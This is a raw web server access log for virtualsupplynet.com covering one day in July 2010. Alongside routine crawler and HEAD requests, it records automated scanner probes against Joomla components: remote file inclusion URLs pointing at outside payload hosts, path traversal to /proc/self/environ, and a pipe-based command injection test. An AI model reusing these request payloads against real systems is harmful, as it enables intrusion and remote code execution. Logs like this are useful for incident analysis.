129.97.219.71 - - [12/Jul/2010:03:51:30 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:04:05:31 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:04:19:52 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:04:36:33 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
122.216.172.214 - - [12/Jul/2010:04:39:17 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
122.216.172.214 - - [12/Jul/2010:04:39:17 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
122.216.172.214 - - [12/Jul/2010:04:39:17 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
122.216.172.214 - - [12/Jul/2010:04:39:33 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:04:51:55 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:05:06:44 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:16:51 -0700] "GET /logs/access_100619.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:16:51 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:16:51 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 3798 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:16:52 -0700] "GET /logs/access_100619.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:16:52 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 3798 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:16:52 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 779 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:18:57 -0700] "GET /logs/access_100703.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:18:57 -0700] "GET /logs/access_100703.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:05:22:43 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:05:24:04 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:05:24:05 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:33:08 -0700] "GET /logs/access_100703.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:33:08 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:33:08 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 3798 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:33:09 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 779 "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:33:09 -0700] "GET /logs/access_100703.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "virtualsupplynet.com"
211.206.120.196 - - [12/Jul/2010:05:33:10 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 3798 "-" "MaMa CaSpEr" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:05:38:26 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:05:55:17 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:06:12:13 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
195.5.163.206 - - [12/Jul/2010:06:20:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:06:27:51 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:06:46:15 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
69.73.157.122 - - [12/Jul/2010:06:59:13 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
69.73.157.122 - - [12/Jul/2010:06:59:13 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
87.238.162.205 - - [12/Jul/2010:06:59:48 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
87.238.162.205 - - [12/Jul/2010:06:59:48 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:07:03:14 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
195.5.163.206 - - [12/Jul/2010:07:08:23 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
195.5.163.206 - - [12/Jul/2010:07:08:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
195.5.163.206 - - [12/Jul/2010:07:08:24 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
195.5.163.206 - - [12/Jul/2010:07:10:46 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:07:19:15 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
85.125.101.77 - - [12/Jul/2010:07:24:56 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
85.125.101.77 - - [12/Jul/2010:07:24:56 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:07:37:03 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:07:54:24 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:08:30:48 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:08:48:38 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:09:06:57 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:09:26:04 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
67.228.235.93 - - [12/Jul/2010:09:32:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:09:37:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:09:37:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:09:45:58 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
67.228.235.93 - - [12/Jul/2010:10:04:17 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
67.228.235.93 - - [12/Jul/2010:10:04:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
67.228.235.93 - - [12/Jul/2010:10:04:17 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:10:04:59 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
67.228.235.93 - - [12/Jul/2010:10:08:40 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:16:53 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:16:53 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:16:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:16:54 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:16:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:16:55 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:22:33 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
114.108.151.149 - - [12/Jul/2010:10:22:46 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:10:22:47 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:10:43:29 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:11:03:26 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:11:23:44 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:11:44:39 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:12:05:21 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:12:26:08 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:12:47:05 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:13:08:51 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:13:30:20 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:13:52:36 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:14:13:56 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:14:13:56 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:14:14:05 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:14:36:37 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:14:58:36 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:15:21:29 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:15:38:10 -0700] "GET /logs/access_100626.log HTTP/1.0" 200 104629 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:15:44:27 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:16:07:11 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:16:30:47 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
89.189.179.214 - - [12/Jul/2010:16:33:50 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
89.189.179.214 - - [12/Jul/2010:16:33:52 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
85.25.143.96 - - [12/Jul/2010:16:38:03 -0700] "GET /logs/access_100703.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
85.25.143.96 - - [12/Jul/2010:16:38:03 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
85.25.143.96 - - [12/Jul/2010:16:38:04 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
88.250.57.232 - - [12/Jul/2010:16:42:20 -0700] "GET /logs/access_100711.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:16:54:33 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:17:19:15 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
208.80.193.35 - - [12/Jul/2010:17:21:04 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; E3003 FI; SV1)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:17:43:08 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:18:32:50 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:18:58:43 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:19:16:02 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:19:16:02 -0700] "GET /logs/access_100501.log HTTP/1.0" 200 73111 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [12/Jul/2010:19:22:51 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:19:24:40 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:19:51:38 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
62.44.82.118 - - [12/Jul/2010:19:59:15 -0700] "GET /logs/access_100703.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
62.44.82.118 - - [12/Jul/2010:19:59:15 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
62.44.82.118 - - [12/Jul/2010:19:59:15 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:20:17:32 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:20:45:15 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "www.virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:20:49:06 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
84.255.193.115 - - [12/Jul/2010:20:49:06 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.816" "virtualsupplynet.com"
